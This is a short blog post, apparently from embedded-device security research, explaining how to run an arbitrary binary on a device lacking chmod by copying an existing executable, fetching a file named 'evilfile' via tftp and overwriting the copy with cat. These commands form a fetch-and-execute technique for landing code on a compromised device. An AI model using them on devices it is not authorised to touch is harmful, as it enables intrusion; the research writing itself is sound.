What do you do when there's no chmod?

22 Sep 2022

In this post, I note a method to run any binary on a device without needing to use chmod or any other program to make the binary executable.

What didn’t work

1) Setting executable permissions on my laptop, hoping tftp would preserve them while downloading — tftp did not keep the permissions.

2) Using umask — You can’t use umask to add permissions to a file because it can only remove permissions.

3) Doing the linker trick — This trick works with a gLibc shared object! But unfortunately, the Hub uses uClibc, with which the trick doesn’t work.

I was stuck for a while, but I did a little thinking outside the box and was able to come up with a solution that worked.

What worked

Because /usr/bin/ was already filled with executable files, I tried just “borrowing” their permissions to run my own file. In my testing, I used /usr/bin/tw.

I first copied the tw binary to /tmp:

cp /usr/bin/tw /tmp/malfile

Then in /tmp, I would download whatever binary I wanted from my laptop using tftp:

tftp -g -r <ip> evilfile

Then, I used cat and piped the output into /tmp/malfile:

cat evilfile > malfile

This overwrites the malfile content, but preserves its permissions. Now, all we have to do is run ./malfile!